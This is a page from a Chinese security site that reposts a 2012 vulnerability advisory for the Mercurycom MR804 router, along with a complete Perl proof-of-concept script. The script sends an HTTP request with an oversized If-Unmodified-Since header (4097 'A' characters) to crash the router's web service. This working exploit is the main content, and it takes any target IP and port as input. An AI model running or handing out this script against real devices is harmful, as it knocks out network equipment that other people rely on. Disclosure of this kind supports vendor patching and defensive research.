首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mercurycom MR804 Router Denial Of Service
来源:demonalex@163.com 作者:demonalex 发布时间:2012-02-23   
Title: Mercurycom MR804 Router -  Multiple HTTP Header Fields Denial Of Service Vulnerability

Product : Mercurycom MR804 Router

Hardware Version : MR804 v8.0 081C3113

Software Version : 3.8.1 Build 101220 Rel.53006nB

Vendor: http://www.mercurycom.com.cn/

Class:  Boundary Condition Error  

CVE:
 
Remote:  Yes  

Local:  No  

Published:  2012-02-21

Updated:  

Impact : Medium (CVSS2 Base : 6.1, AV:A/AC:L/Au:N/C:N/I:N/A:C)

Bug Description :
Mercurycom router are commonly used for internet connectivity for home or small office needs. (http://www.mercurycom.com.cn/Product/list)
Mercurycom MR804 Router contains any denial of service vulnerability about HTTP Header Fields(Such as If-Modified-Since, If-None-Match,
If-Unmodified-Since, etc...) in its HTTP service.

POC:
#-------------------------------------------------------------
#!/usr/bin/perl -w
use Socket;
$|=1;
print '*********************************'."\n";
print '* mercurycom MR804 v8.0 DoS PoC *'."\n";
print '*  writed by demonalex@163.com  *'."\n";
print '*********************************'."\n";
$evil='A'x4097;
$test_ip=shift;                           #target ip
$test_port=shift;                         #target port
if(!defined($test_ip) || !defined($test_port)){
	die "usage : $0 target_ip target_port\n";
}
$test_payload=
"GET / HTTP/1.0\r\n".
"Accept: */*\r\n".
"Accept-Language: zh-cn\r\n".
"UA-CPU: x86\r\n".
"If-Unmodified-Since: ".$evil."\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;".
" .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)\r\n".
"Host: ".$test_ip."\r\n".
"Connection: Keep-Alive"."\r\n\r\n";
$test_target=inet_aton($test_ip);
$test_target=sockaddr_in($test_port, $test_target);
socket(SOCK, AF_INET, SOCK_STREAM, 6) || die "cannot create socket!\n";
connect(SOCK, $test_target) || die "cannot connect the target!\n";
send(SOCK, $test_payload, 0) || die "cannot send the payload!\n";
#recv(SOCK, $test_payload, 100, 0);
close(SOCK);
print "done!\n";
exit(1);
#-------------------------------------------------------------

Credits : This vulnerability was discovered by demonalex@163.com
mail: demonalex@163.com / ChaoYi.Huang@connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DAMN Hash Calculator v1.5.1 Lo
·TrendMicro Control Manger <= v
·linux/x86 BackShell-TCP bash[/
·Orbit Downloader URL Unicode C
·Core FTP Server 1.2 Build 422
·The Uploader 2.0.4 (Eng/Ita) R
·DJ Studio Pro 5.1.6.5.2 SEH Ex
·Blade API Monitor Unicode Bypa
·HP Data Protector 6.1 EXEC_CMD
·linux提权之跨目录访问拿webshel
·Sun Java Web Start Plugin Comm
·PCAnywhere 12.5.0 build 463 De
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved